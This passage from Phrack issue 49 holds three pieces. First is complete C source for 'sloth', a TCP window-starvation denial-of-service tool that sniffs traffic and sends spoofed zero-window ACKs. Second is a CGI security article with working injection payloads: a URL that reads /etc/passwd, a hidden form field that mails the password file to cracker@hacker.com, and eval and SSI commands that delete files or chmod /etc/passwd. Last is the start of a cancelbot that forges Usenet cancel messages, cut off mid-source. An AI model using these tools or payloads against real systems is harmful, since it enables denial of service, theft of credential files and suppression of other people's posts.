                        /* Packet assembly begins here */
        
                                /* Fill in all the TCP header information */
        
        packet.tcp.source=htons(666);        	/* 16-bit Source port number */
        packet.tcp.dest=htons(port);   		/* 16-bit Destination port */
        if(mode)packet.tcp.seq=0;        	/* 32-bit Sequence Number */
        else packet.tcp.seq=htonl(10241024);
	if(!mode)packet.tcp.ack_seq=0;    	/* 32-bit Acknowledgement Number */
	else packet.tcp.ack_seq=htonl(102410000);
        packet.tcp.doff=5;              	/* Data offset */
        packet.tcp.res1=0;              	/* reserved */
        packet.tcp.res2=0;              	/* reserved */
      	packet.tcp.urg=0;               	/* Urgent offset valid flag */
        packet.tcp.ack=0;               	/* Acknowledgement field valid flag */
        packet.tcp.psh=0;               	/* Push flag */
        if(!mode)packet.tcp.rst=0;               /* Reset flag */
        else packet.tcp.rst=1;
	if(!mode)packet.tcp.syn=1;               /* Synchronize sequence numbers flag */
	else packet.tcp.syn=0;
        packet.tcp.fin=0;               	/* Finish sending flag */
        packet.tcp.window=htons(512);	 	/* 16-bit Window size */
        packet.tcp.check=0;             	/* 16-bit checksum (to be filled in below) */
        packet.tcp.urg_ptr=0;           	/* 16-bit urgent offset */
        
                                /* Fill in all the IP header information */
        
        packet.ip.version=4;            	/* 4-bit Version */
        packet.ip.ihl=5;                	/* 4-bit Header Length */
        packet.ip.tos=0;                	/* 8-bit Type of service */
    	packet.ip.tot_len=htons(IPHDR+TCPHDR);  /* 16-bit Total length */
        packet.ip.id=0;         		/* 16-bit ID field */
        packet.ip.frag_off=0;           	/* 13-bit Fragment offset */
        packet.ip.ttl=64;	              	/* 8-bit Time To Live */
        packet.ip.protocol=IPPROTO_TCP; 	/* 8-bit Protocol */
        packet.ip.check=0;              	/* 16-bit Header checksum (filled in below) */
        packet.ip.saddr=source;           /* 32-bit Source Address */
        packet.ip.daddr=target;           /* 32-bit Destination Address */
        
        pseudo_header.source_address=(unsigned)packet.ip.saddr;
        pseudo_header.dest_address=(unsigned)packet.ip.daddr;
        pseudo_header.placeholder=0;
     	pseudo_header.protocol=IPPROTO_TCP;
        pseudo_header.tcp_length=htons(TCPHDR);
        
     			/* IP header checksum */
        
      	packet.ip.check=in_cksum((unsigned short *)&packet.ip,IPHDR);
                
			/* TCP header checksum */
                                
        bcopy((char *)&packet.tcp,(char *)&pseudo_header.tcp,IPHDR);
       	packet.tcp.check=in_cksum((unsigned short *)&pseudo_header,TCPHDR+12);

	sendto(sock,&packet,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
}

-------------------------------8<-------cut-me-loose--------------------------

/*
                            The Hades Project
                    Explorations in the Weakness of TCP
                          TCP Window Starvation
                                 (sloth)
                                 v. 1.0

                        daemon9/route/infinity

                     October 1996 Guild productions

                     comments to route@infonexus.com


   This coding project made possible by a grant from the Guild corporation

*/


#include "lnw.h"

	/* experiment with this value.  Different things happen with different sizes */

#define SLOTHWINDOW	0

void main(){

	void sl0th(struct iphdr *,struct tcphdr *,int);

	struct epack{				/* Generic Ethernet packet w/o data payload */
		struct ethhdr eth;		/* Ethernet Header */
		struct iphdr ip;		/* IP header */
		struct tcphdr tcp;		/* TCP header */
	}epack;

	int sock,shoe,dlen;
	struct sockaddr dest;
	struct iphdr  *iphp;
	struct tcphdr *tcphp;

	if(geteuid()||getuid()){
                fprintf(stderr,"UID or EUID of 0 needed...
");
                exit(0);
        }
	sock=tap(DEVICE);		/* Setup the socket and device */

				/* Could use the SOCK_PACKET but building Ethernet headers would
				 require more time overhead; the kernel can do it quicker then me */
	if((shoe=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
                perror("
Hmmm.... socket problems");
                exit(1);
        }  
	shadow();			/* Run as a daemon */	

	iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);
  	tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);   

   	/* Network reading loop */
	while(1)if(recvfrom(sock,&epack,sizeof(epack),0,&dest,&dlen))if(iphp->protocol==IPPROTO_TCP&&tcphp->ack)sl0th(iphp,tcphp,shoe);
}


/*
 *	Build a packet and send it off.
 */

void sl0th(iphp,tcphp,shoe)
struct iphdr *iphp;
struct tcphdr *tcphp;
int shoe;
{
   	
	void dump(struct iphdr *,struct tcphdr *);
        
        struct tpack{			/* Generic TCP packet w/o payload */
                struct iphdr ip;	
                struct tcphdr tcp;
        }tpack;                
        
        struct pseudo_header{           /* For TCP header checksum */
                unsigned source_address;
                unsigned dest_address;
                unsigned char placeholder;
                unsigned char protocol;
                unsigned short tcp_length;
                struct tcphdr tcp;
        }pheader;
  
   	struct sockaddr_in sin;         /* IP address information */
                        		/* Setup the sin struct with addressing information */
      	sin.sin_family=AF_INET;  	/* Internet address family */
        sin.sin_port=tcphp->dest;       /* Source port */
        sin.sin_addr.s_addr=iphp->saddr;/* Dest. address */

                        /* Packet assembly begins here */
        
                                /* Fill in all the TCP header information */

        tpack.tcp.source=tcphp->dest;   /* 16-bit Source port number */
        tpack.tcp.dest=tcphp->source;   /* 16-bit Destination port */
        tpack.tcp.seq=htonl(ntohl(tcphp->ack_seq));    /* 32-bit Sequence Number */
        tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq));    /* 32-bit Acknowledgement Number */
        tpack.tcp.doff=5;              	/* Data offset */
        tpack.tcp.res1=0;              	/* reserved */
        tpack.tcp.res2=0;              	/* reserved */
      	tpack.tcp.urg=0;               	/* Urgent offset valid flag */
        tpack.tcp.ack=1;               	/* Acknowledgement field valid flag */
        tpack.tcp.psh=0;               	/* Push flag */
        tpack.tcp.rst=0;               	/* Reset flag */
        tpack.tcp.syn=0;               	/* Synchronize sequence numbers flag */
        tpack.tcp.fin=0;               	/* Finish sending flag */
        tpack.tcp.window=htons(SLOTHWINDOW);	 /* 16-bit Window size */
        tpack.tcp.check=0;             	/* 16-bit checksum (to be filled in below) */
        tpack.tcp.urg_ptr=0;           	/* 16-bit urgent offset */
        
                                /* Fill in all the IP header information */
        
        tpack.ip.version=4;            	/* 4-bit Version */
        tpack.ip.ihl=5;                	/* 4-bit Header Length */
        tpack.ip.tos=0;                	/* 8-bit Type of service */
    	tpack.ip.tot_len=htons(IPHDR+TCPHDR);  /* 16-bit Total length */
        tpack.ip.id=0;         		/* 16-bit ID field */
        tpack.ip.frag_off=0;           	/* 13-bit Fragment offset */
        tpack.ip.ttl=64;	        /* 8-bit Time To Live */
        tpack.ip.protocol=IPPROTO_TCP; 	/* 8-bit Protocol */
        tpack.ip.check=0;              	/* 16-bit Header checksum (filled in below) */
        tpack.ip.saddr=iphp->daddr;    	/* 32-bit Source Address */
        tpack.ip.daddr=iphp->saddr;    	/* 32-bit Destination Address */
        
        pheader.source_address=(unsigned)tpack.ip.saddr;
        pheader.dest_address=(unsigned)tpack.ip.daddr;
        pheader.placeholder=0;
     	pheader.protocol=IPPROTO_TCP;
        pheader.tcp_length=htons(TCPHDR);
        
     			/* IP header checksum */
        
      	tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR);
                
			/* TCP header checksum */
                                
        bcopy((char *)&tpack.tcp,(char *)&pheader.tcp,TCPHDR);
       	tpack.tcp.check=in_cksum((unsigned short *)&pheader,TCPHDR+12);

	sendto(shoe,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
#ifndef QUIET
	dump(iphp,tcphp);
#endif
}

/* 
 *	Dumps some info...
 */

void dump(iphp,tcphp)
struct iphdr *iphp;
struct tcphdr *tcphp;
{
	fprintf(stdout,"Hmm... I smell an ACK: ");
   	fprintf(stdout,"%s [%d] --> %s [%d]
",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest)); 
	fprintf(stdout,"let's slow things down a bit
");
}


-------------------------------8<-------cut-me-loose--------------------------


/*
		Basic Linux Networking Header Information. v1.0

   		   c. daemon9, Guild Corporation 1996

Includes:

	tap
	in_cksum
	nameResolve
	hostLookup	
	shadow
	reaper

	This is beta.  Expect it to expand greatly the next time around ...
	Sources from all over the map.

		code from:
			route
			halflife
*/

#include <string.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <syslog.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <linux/socket.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/if_ether.h>
#include <linux/if.h>

#define DEVICE 		"eth0"
#define BUFSIZE 	256
#define ETHHDR 		14
#define TCPHDR 		20
#define IPHDR  		20
#define ICMPHDR 	8


/*
 *      IP address into network byte order
 */
                 
unsigned nameResolve(char *hostname){
        
        struct in_addr addr;
        struct hostent *hostEnt; 
   
        if((addr.s_addr=inet_addr(hostname))==-1){
                if(!(hostEnt=gethostbyname(hostname))){
                        fprintf(stderr,"Name lookup failure: `%s`
",hostname);
                        exit(0);
                }
                bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
        }
        return addr.s_addr;
}
 
/*
 *      IP Family checksum routine
 */

unsigned short in_cksum(unsigned short *ptr,int nbytes){
                        
        register long           sum;            /* assumes long == 32 bits */
        u_short                 oddbyte;
        register u_short        answer;         /* assumes u_short == 16 bits */
                        
        /*
         * Our algorithm is simple, using a 32-bit accumulator (sum),
         * we add sequential 16-bit words to it, and at the end, fold back 
         * all the carry bits from the top 16 bits into the lower 16 bits. 
         */
        
        sum = 0;
        while (nbytes > 1)  {
                sum += *ptr++;
                nbytes -= 2;    
        }
                        
                                /* mop up an odd byte, if necessary */
        if (nbytes == 1) {
                oddbyte = 0;            /* make sure top half is zero */
                *((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
                sum += oddbyte;
        }               
  
        /*
         * Add back carry outs from top 16 bits to low 16 bits.
         */
         
        sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
        sum += (sum >> 16);                     /* add carry */
        answer = ~sum;          /* ones-complement, then truncate to 16 bits */
        return(answer);
}


/*
 *	Creates a low level raw-packet socket and puts the device into promiscuous mode.
 */

int tap(device)
char *device;
{
	
	int fd;				/* File descriptor */
   	struct ifreq ifr;		/* Link-layer interface request structure */
					/* Ethernet code for IP 0x800==ETH_P_IP */
   	if((fd=socket(AF_INET,SOCK_PACKET,htons(ETH_P_IP)))<0){	/* Linux's way of */ 
      		perror("SOCK_PACKET allocation problems");	/* getting link-layer */
      		exit(1);					/* packets */
   	}
	strcpy(ifr.ifr_name,device);				
   	if((ioctl(fd,SIOCGIFFLAGS,&ifr))<0){			/* Get the device info */
      		perror("Can't get device flags");
      		close(fd);
      		exit(1);
   	}
   	ifr.ifr_flags|=IFF_PROMISC;				/* Set promiscuous mode */
   	if((ioctl(fd,SIOCSIFFLAGS,&ifr))<0){			/* Set flags */
		perror("Can't set promiscuous mode");
   		close(fd);
		exit(1);
	}
	return(fd);
}

/*
 *	Network byte order into IP address
 */

char *hostLookup(in)
unsigned long in;
{
 
   	char hostname[BUFSIZE];
   	struct in_addr addr;
   	struct hostent *hostEnt;
   
	bzero(&hostname,sizeof(hostname));
	addr.s_addr=in;
   	hostEnt=gethostbyaddr((char *)&addr, sizeof(struct in_addr),AF_INET);
   	if(!hostEnt)strcpy(hostname,inet_ntoa(addr));
   	else strcpy(hostname,hostEnt->h_name);
   	return(strdup(hostname));
}
 
/*
 *      Simple daemonizing procedure.
 */   

void shadow(void){

        int fd,fs;
        extern int errno;
     	char werd[]={"



Hades is a Guild Corporation Production.  c.1996

"}; 

        signal(SIGTTOU,SIG_IGN);        /* Ignore these signals */
        signal(SIGTTIN,SIG_IGN);
        signal(SIGTSTP,SIG_IGN);
	printf(werd);

        switch(fork()){
               case 0:                 /* Child */
                        break;
                default:        
                        exit(0);        /* Parent */
                case -1:
                        fprintf(stderr,"Forking Error
");
                        exit(1);
        }
        setpgrp();
        if((fd=open("/dev/tty",O_RDWR))>=0){
                ioctl(fd,TIOCNOTTY,(char *)NULL);
                close(fd);
        }
        /*for(fd=0;fd<NOFILE;fd++)close(fd);*/
        errno=0;
        chdir("/");
        umask(0);
}

/*
 *      Keeps processes from zombiing on us...
 */
        
static void reaper(signo)
int signo;
{
        pid_t pid;
        int sys;

        pid=wait(&sys); 
        signal(SIGCHLD,reaper);
        return;
}


-------------------------------8<-------cut-me-loose--------------------------

EOF



--------------------------------------------------------------------------------


                                .oO Phrack 49 Oo.

                          Volume Seven, Issue Forty-Nine
                                     
                                   File 08 of 16

				CGI Security Holes
--------------------------------------------------------------------------
				by Gregory Gilliss


	This article will discuss the Common Gateway Interface, its 
relationship to the World Wide Web and the Internet, and will endeavor to 
point out vulnerabilities in system security exposed by its use.  The UNIX 
operating system will be the platform central to this discussion.  
Programming techniques will be illustrated by examples using PERL.  

1.	Introduction

	The Common Gateway Interface (CGI) is an interface specification that
allows communication between client programs and information servers which 
understand the Hyper-Text Transfer Protocol (HTTP).  TCP/IP is the 
communications protocol used by the CGI script and the server during the 
communications.  The default port for communications is port 80 (privileged),
but other non-privileged ports may be specified.

	CGI scripts can perform relatively simple processing on the client 
side.  A CGI script can be used to format Hyper-Text Markup Language (HTML) 
documents, dynamically create HTML documents, and dynamically generate 
graphical images.  CGI can also perform transaction recording using standard 
input and standard output.  CGI stores information in system environment 
variables that can be accessed through the CGI scripts.  CGI scripts can also
accept command line arguments.  CGI scripts operate in two basic modes:  

	- In the first mode, the CGI script performs rudimentary data 
processing on the input passed to it.  An example of data processing is the 
popular web lint page that checks the syntax of HTML documents.  

	- The second mode is where the CGI script acts as a conduit for data 
being passed from the client program to the server, and back from the 
server to the client.  For example, a CGI script can be used as a front end 
to a database program running on the server.  

	CGI scripts can be written using compiled programming languages, 
interpreted programming languages, and scripting languages.  The only real 
advantage that exists for one type of development tool over the other is that
compiled programs tend to execute more quickly than interpreted programs.  
Interpreted languages such as AppleScript, TCL, PERL and UNIX shell scripts 
afford the possibility of acquiring and modifying the source (discussed 
later), and are generally faster to develop than compiled programs.  

	The set of common methods available to CGI programs is defined in 
the HTTP 1.0 specification.  The three methods pertinent to this discussion 
are the `Get` method, the `Post` method, and the `Put` method.  The `Get` 
method retrieves information from the server to the client.  The `Post` 
method asks the server to accept information passed from the client as input 
to the specified target. The `Put` method asks the server to accept 
information passed from the client as a replacement for the specified target.

2.	Vulnerabilities

	The vulnerabilities caused by the use of CGI scripts are not 
weaknesses in CGI itself, but are weaknesses inherent in the HTTP 
specification and in various system programs.  CGI simply allows access to 
those vulnerabilities.  There are other ways to exploit the system security.
For example, insecure file permissions can be exploited using FTP or telnet.
CGI simply provides more opportunities to exploit these and other security 
flaws.

	The CGI specification provides opportunities to read files, acquire 
shell access, and corrupt file systems on server machines and their attached 
hosts.  Means of gaining access include: exploiting assumptions of the 
script, exploiting weaknesses in the server environment, and exploiting 
weaknesses in other programs and system calls.  The primary weakness in 
CGI scripts is insufficient input validation.

	According to the HTTP 1.0 specification, data passed to a CGI script 
must be encoded so that it can work on any hardware or software platform.  
Data passed by a CGI script using the Get method is appended to the end of a 
Universal Resource Locator (URL).  This data can be accessed by the CGI 
script as an environment variable named QUERY_STRING.  Data is passed as 
tokens of the form variable=value, with the tokens separated by ampersands 
(&).  Actual ampersands, and other non-alphanumeric characters, must be 
escaped, meaning that they are encoded as two-digit hexadecimal values.  
Escaped characters are preceded by a percent sign (%) in the encoded URL.  It
is the responsibility of the CGI script to escape or remove characters in 
user supplied input data.  Characters such as '<' and '>', the delimiters for
HTML tags, are usually removed using a simple search and replace operation, 
such as the following:

----------------8<----------------------------------------------------------

# Process input values
{$NAME, $VALUE) = split(/=/, $_);	# split up each variable=value pair
$VALUE =~ s/+/ /g;			# Replace '+' with ' '
$VALUE =~ s/%([0-9|A-F]{2})/pack(C,hex,{$1}}/eg;  # Replace %xx characters with ASCII
# Escape metacharacters
$VALUE =~ s/([;<>*|'&$!#()[]{}:"])/\$1/g;# remove unwanted special characters
$MYDATA[$NAME} = $VALUE;	# Assign the value to the associative array

----------------8<----------------------------------------------------------

	This example removes special characters such as the semi-colon 
character, which is interpreted by the shell as a command separator.  
Inclusion of a semi-colon in the input data allows for the possibility 
of appending an additional command to the input.  Take note of the forward 
slash characters that precede the characters being substituted.  In PERL, a 
backslash is required to tell the interpreter not to process the following 
character.*

	The above example is incomplete since it does not address the 
possibility of the new line character '%0a', which can be used to execute 
commands other than those provided by the script.  Therefore it is possible to 
append a string to a URL to perform functions outside of the script.  For 
example, the following URL requests a copy of /etc/passwd from the server 
machine:

http://www.odci.gov/cgi-bin/query?%0a/bin/cat%20/etc/passwd

The strings '%0a" and '%20' are ASCII line feed and blank respectively.

	The front end interface to a CGI program is an HTML document called a 
form.  Forms include the HTML tag <INPUT>.  Each <INPUT> tag has a variable 
name associated with it.  This is the variable name that forms the left hand 
side of the previously mentioned variable=value token.  The contents of the 
variable forms the value portion of the token.  Actual CGI scripts may 
perform input filtering on the contents of the <INPUT> field.  However if the
CGI script does not filter special characters, then a situation analogous to 
the above example exists.  Interpreted CGI scripts that fail to validate the 
<INPUT> data will pass the data directly to the interpreter. **

	Another HTML tag sometime seen in forms is the <SELECT> tag.  
<SELECT> tags allow the user on the client side to select from a finite set 
of choices.  The selection becomes the right hand side of the variable=value 
token passed to the CGI script.  CGI script often fail to validate the 
input from a <SELECT> field, assuming that the field will contain only 
pre-defined data.  Again, this data is passed directly to the interpreter for
interpreted languages.  Compiled programs which do not perform input 
validation and/or escape special characters may also be vulnerable.

	A shell script or PERL script that invokes the UNIX mail program may 
be vulnerable to a shell escape.  Mail accepts commands of the form 
'~!command' and forks a shell to execute the command.  If the CGI 
script does not filter out the '~!' sequence, the system is vulnerable.  
Sendmail holes can likewise be exploited in this manner.  Again, the key is 
to find a script that does not properly filter input characters.

	If you can find a CGI script that contains a UNIX system() call with 
only one argument, then you have found a doorway into the system.  When the 
system() function is invoked with only one argument, the system forks a 
separate shell to handle the request.  When this happens, it is possible to 
append data to the input and generate unexpected results.  For example, a 
PERL script containing the following:

system("/usr/bin/sendmail -t %s < %s", $mailto_address < $input_file");

is designed to mail a copy of $input_file to the mail address specified in 
the $mailto_address variable.  By calling system() with one argument, the 
program causes a separate shell to be forked.  By copying and modifying the 
input to the form:

<INPUT TYPE="HIDDEN" NAME="mailto_address" 
VALUE="address@server.com;mail cracker@hacker.com </etc/passwd">

we can exploit this weakness and obtain the password file from the server. ***

	The system() function is not the only command that will fork a new 
shell.  the exec() function with a single argument also provides the same 
exposure.  Opening a file and piping the result also forks a separate shell.  
In PERL, the function:

open(FILE, "| program_name $ARGS");

will open FILE and pipe the contents to program_name, which will run as a 
separate shell.

	In PERL, the eval command parses and executes whatever argument is 
passed to it.  CGI scripts that pass arbitrary user input to the eval command
can be used to execute anything the user desires.  For example, 

$_ = $VALUE;
s/"/\"/g		# Escape double quotes
$RESULT = eval qq/"$_"/;	# evaluate the correctly quoted input

would pass the data from $VALUE to eval essentially unchanged, except for 
ensuring that the double quote don't confuse the interpreter (how nice of 
them).  If $VALUE contains "rm -rf *", the results will be disastrous.  File 
permissions should be examined carefully.  CGI scripts that are world 
readable can be copied, modified, and replaced.  In addition, PERL scripts 
that include lines such as the following:

require "cgi-lib";

are including a library file named cgi-lib.  If this file's permissions are 
insecure, the script is vulnerable.  To check file permissions, the string 
'%0a/bin/ls%20-la%20/usr/src/include" could be appended to the URL of a CGI 
script using the Get method.

	Copying, modifying, and replacing the library file will allow users 
to execute command or routines inside the library file.  Also, if the PERL 
interpreter, which usually resides in /usr/bin, runs as SETUID root, it is 
possible to modify file permissions by passing a command directly to the 
system through the interpreter.  The eval command example above would permit 
the execution of :

$_ = "chmod 666 /etc/passwd"
$RESULT = eval qq/"$_"/;

which would make the password file world writable.

	There is a feature supported under some HTTPD servers called Server 
Side Includes (SSI).  This is a mechanism that allows the server to modify 
the outgoing document before sending it to the client browser.  SSI is a 
*huge* security hole, and most everyone except the most inexperienced 
sysadmin has it disabled.  However, in the event that you discover a site 
that enables SSI,, the syntax of commands is:

<!--#command variable="value" -->

Both command and 'tag' must be lowercase.  If the script source does not 
correctly filter input,input such as:

<!--#exec cmd="chmod 666 /etc/passwd"--> 

	All SSI commands start with a pound sign (#) followed by a keyword.  
"exec cmd" launches a shell that executes a command enclosed in the double 
quotes.  If this option is turned on, you have enormous flexibility with what
you can do on the target machine.

3.	Conclusion

	The improper use of CGI scripts affords users a number of 
vulnerabilities in system security.  Failure to validate user input, poorly 
chosen function calls, and insufficient file permissions can all be exploited
through the misuse of CGI.



*   Adapted from Mudry, R. J., Serving The Web, Coriolis Group Books, p. 192
**  Jennifer Myers, Usenet posting
*** Adapted from Phillips, P., Safe CGI Programming, 


--------------------------------------------------------------------------------


                            .oO Phrack Magazine Oo.

                        Volume Seven, Issue Forty-Nine
			
			         File 09 of 16

      			  by Dr.Dimitri Vulis (KOTM)

               A Content-Blind Cancelbot for Usenet (CBCB)

Usenet News is a popular system for transmitting articles. Historically it
used to propagate over UUCP. However today most of the transmission is done
over the Internet TCP/IP connections using the NNTP protocol (RFC 977).

Each article consists of a series of headers of the form
Keyword: value
followed by a blank line, followed by the body of the message.
Some required headers are self-explanatory: From:, Date:, Subject:.

The Newsgroups: header identifies a series of keywords that can be used
to search for articles in the newsfeed. For example:
Newsgroups: news.admin.policy,comp.lang.c
identifies a Usenet article relevant to both Usenet administrative policy
and to the C computer language.

The Message-Id: header uniquely identifies each article. For example:
Message-Id: <12341223@whitehouse.gov>
The message-ids are not supposed to be recycled.

The cancelbot program is supposed to search the user-specified newsgroups for
articles whose headers match user-specified regular expressions and to issue
special 'cancel' control articles. It will copy some of the headers from the
original message and add a special header:
Control: cancel <message-id>

This program is an NNTP client. Much of the processing is offloaded to an
NNTP server, to which the cancelbot talks using the Internet sockets protocol.

This cancelbot does not look at article bodies and is therefore content-blind.

Inputs:

argv[1] (required) hosts file

A line that starts with # is a comment. Otherwise, each line contains the
following 5 fields:

1. hostname (some.domain.com) or ip address (a.b.c.d)
2. port (normally 119)
3. Y/N - do we ask this host for NEWNEWS/HEADER?
4. I/P/N - do we inject cancels to this host with IHAVE, POST, not at all
5. Timeout - the number of seconds to wait for a response from this server.

Example of a hosts file:

# ask the local server for new news and post back the cancels
127.0.0.1 119 Y P 60
# don't get message-ids from remote server, but give it cancels via IHAVE
news.xx.net 119 N I 300


argv[2] (required) target file

A line that starts with # is a comment. Otherwise, each line contains the
following 9 fields:

1. List of newsgroups to be scanned for new messages. This is not interpreted
by the cancelbot, but passed on to the NNTP server. Per RFC 997, multiple
groups can be separated by commas. Asterisk "*" may be used to match multiple
newsgroup names. The exclamation point "!" (as the first character) may be used
to negate a match. Warning: specifying a single * will generate a lot of data.

Example: news.groups,comp.*,sci.*,!sci.math.*

2. A watchword (case-sensitive) that needs to be contained in the article
headers for the cancel to be issued.

3. Format of the Subject: header in the cancel article.
 C - Subject cancel <message-id> (same as Control:)
 O - Subject: header copied from the original article
 N - none.
If N is specified, then Subject: MUST be provided in the file appended to
the header, or the cancel won't propagate.

4. cancel message-id prefix
 normally cancel. or cn.

Most cancellation articles follow the so-called $alz convention:
Control: cancel <message.id>
Message-id: <cancel.message.id>
However this is not a requirement.

5. path constant (string to put in path). May be 'none'.
6. path copy # (number of elements to copy from the right, may be 0)

Explanation of these two parameters:
each Usenet article contains the "Path:" header with a list of hosts separated
by explanation marks. For example:
Path: ohost1!ohost2!ohost3!ohost4
If you specify path constant of "nhosta!nhostb" and path copy of 2
then the path written by cbcb will be
Path: nhosta!nhostb!ohost3!ohost4

7. Name of the file appended to the header or 'none'

Examples:

# should be supplied as a courtesy
X-Cancelled-By: Cancelbot
# if and only if target file field 3 contains 'N':
Subject: Cancelling a Usenet article
# only if posting via IHAVE:
NNTP-Posting-Host: usenet.cabal.org

8. Name of the file that will become the body of the cancel or 'none'

If 'none' is specified, the default will be
"Please cancel this article."

9. The string to be prepended to the newsgroups. Normally 'none',
but may be set to something like misc.test (or misc.test,alt.test).

Example of a target file:

# delete all articles that mention C++ (but not c++)
comp.lang.c.* C++ C cancel. cyberspam 3 can.hdr none none
# no sex in the sci hierarchy, and add misc.test to the cancel
sci.* sex C cn. plutonium 2 can1.hdr can.txt misc.test

argv[3] (optional) datestamp, YYMMDD. If not specified, default is 900101. Only
articles after this date are examined. This parameter is not processed by the
cancelbot, but passed on to the NNTP server. It should normally be specified
so as not to look at old Usenet articles.

argv[4] (optional) timestamp, digits HHMMSS, where HH is hours on the 24-hour
clock, MM is minutes 00-59, and SS is seconds 00-59. If not specified, default
is 000000. Note that both datestamp and timestamp are in Greenwich mean time.

---------------8<-------cut me loose!-------------->8--------------------------
ed-note:
To compile, you must define an OS type (under gcc, this is accomplished using
the -Dmacro directive).  Under Unix, for example:
gcc -DCBCB_UNIX -o cancelbot cbcb.c

---------------8<-------cut me loose!-------------->8--------------------------

cbcb.c:
/*

Context-blind CancelBot 0.9 04/01/96

Description of operations:

Open socket connections to the hosts listed in the hosts file

loop on targets
 {
 loop on servers
  {
  if (newnews_flag=='Y')
   {
   send NEWNEWS newsgroups datestamp timestamp GMT to this socket
   receive a list of message-ids and save them in a LIFO linked list
   loop on message-ids
     {
     send HEADER message-id to this server's socket
     receieve a header
     if the header contains the watchword
      {
      compose a cancel according to the target file specifications
      loop on servers
       {
       if post_flag is P or I
        send the cancel to this server's socket using posting method
       }
      }
     delete this message-id from the linked list
     }
    }
   }
  }

*/

#ifndef CBCB_UNIX
#ifndef CBCB_VMS
#ifndef CBCB_NT
#ifndef CBCB_OS2
#error One of (CBCB_UNIX, CBCB_VMS, CBCB_NT, CBCB_OS2) must be defined
#endif
#endif
#endif
#endif

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <ctype.h>

/* various flavors of Unix */

#ifdef CBCB_UNIX
/* gcc -DCBCB_UNIX cbcb.c -o cbcb */
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
/* perror to be called after failed socket calls */
#define perror_sock perror
/* how to close a socket */
#define close_sock close
#endif

/* Windows NT, /subsystem:console. The executable is supposed to work
under NT and Windows 95, but not under Win32s. */

#ifdef CBCB_NT
/* important note: when compiling on NT, say something like
 cl /DCBCB_NT /Ogaityb1 /G5Fs /ML cbcb.c wsock32.lib */
#include <winsock.h>
/* regular perror doesn't work with WinSock under NT */
#define perror_sock(s) fprintf(stderr,"%s : WinSock error %d
",s,WSAGetLastError())
/* regular close doesn't work with WinSock under NT */
#define close_sock closesocket
/* NT doesn't understand unix-style sleep in seconds */
#define sleep(n) Sleep(n*1000)
#endif

/* DEC VAX/VMS */

#ifdef CBCB_VMS
/* important note: when compiling on VAX/VMS, say something like
 cc/define=CBCB_VMS cbcb/nodebug/optimize=(disjoint,inline)
 link cbcb/nouserlib/notraceback,sys$library:ucx$ipc.olb/lib,-
  sys$library:vaxcrtl.olb/lib
   (to link in shared routines)
  */
#include <types.h>
#include <socket.h>
#include <netdb.h>
#include <in.h>
#include <inet.h>
#include <time.h>
#include <unixio.h>
#define perror_sock perror
#define close_sock close
#endif

/* IBM OS/2  - link with tcpip.lib */

#ifdef CBCB_OS2
#define OS2
/* we will use a BSD-like select, not Oleg's hack */
#define BSD_SELECT
#define INCL_DOSPROCESS
#include <bsedos.h> /* DosSleep */
#include <sys	ypes.h>
#include <syssocket.h>
#include <sysselect.h>
#include <netinetin.h>
/*#include <arpainet.h>*/
#include <netdb.h>
/* perror to be called after failed socket calls */
#define perror_sock fprintf(stderr,"%s : tcp error %d
",s,tcperrno())
/* how to close a socket */
#define close_sock soclose
#define sleep(n) DosSleep(n/1000)
#endif

/*

Future Macintosh notes: Need Apple's MPW (Macintosh Programmer's Workshop).
Build CBCB as an MPW tool. Set the Macintosh file type to MPST and the
Macintosh creator to MPS, so we can use stdout and stderr.

Sockets are supposed to be available on the Mac.

*/

#ifndef FD_ZERO
/* macros for select() not defined on VAX or HPUX
However they are defined to be something completely different
under NT WinSock, so we must use macros */
#define fd_set int
#define FD_ZERO(p) {*(p)=0;}
#define FD_SET(s,p) {*(p)|=(1<<(s));}
#define FD_ISSET(s,p) ((*(p)&(1<<(s)))!=0)
#endif

/* file pointers */
FILE *sptr, /* hosts file */
     *tptr; /* target file*/

/* there's a reason for making all these variables static. If I weren't lazy,
I would have put them in their respective functions with 'static' */

#define MAXHOSTS 100

struct {
int cfd; /* socket handle */
char newnews_flag;
char post_flag;
int timeout;
} hosts[MAXHOSTS];
int nhosts;

short int port;

#define ASCII_CR 13
#define ASCII_LF 10

#define BUFFERSIZE 2048

#define BUFFERBIGSIZE 20480
char buffer_big[BUFFERBIGSIZE];

struct _msgidq {
char *msgid;
struct _msgidq *next;
};

struct _msgidq *msg_queue,*msg_t;

int parse_state, /* for parsing server responses */
 h_flag,d_flag; /* shortcut for states when parsing headers */

char hostname[BUFFERSIZE];
char buffer[BUFFERSIZE];
char extra_header[BUFFERSIZE];
char extra_body[BUFFERSIZE];
int file_rec;
char newsgroups[BUFFERSIZE];       /* target field 1 */
char watchword[BUFFERSIZE];        /* target field 2 */
char subject_flag;                 /* target field 3 */
char cmsg_id_prefix[BUFFERSIZE];   /* target field 4 */
char path_const[BUFFERSIZE];       /* target field 5 */
int  path_num;                     /* target field 6 */
char hdr_fname[BUFFERSIZE];        /* target field 7 */
char txt_fname[BUFFERSIZE];        /* target field 8 */
char extra_ngrp[BUFFERSIZE];         /* target field 9 */

char *datestamp,*timestamp; /* for the NEWNEWS command */
char *sznone="none";
char *szcabal=" Usenet@Cabal";
char *szsubject="Subject:";
char *szsubjectc="Subject: cmsg";
char *szendl="
";
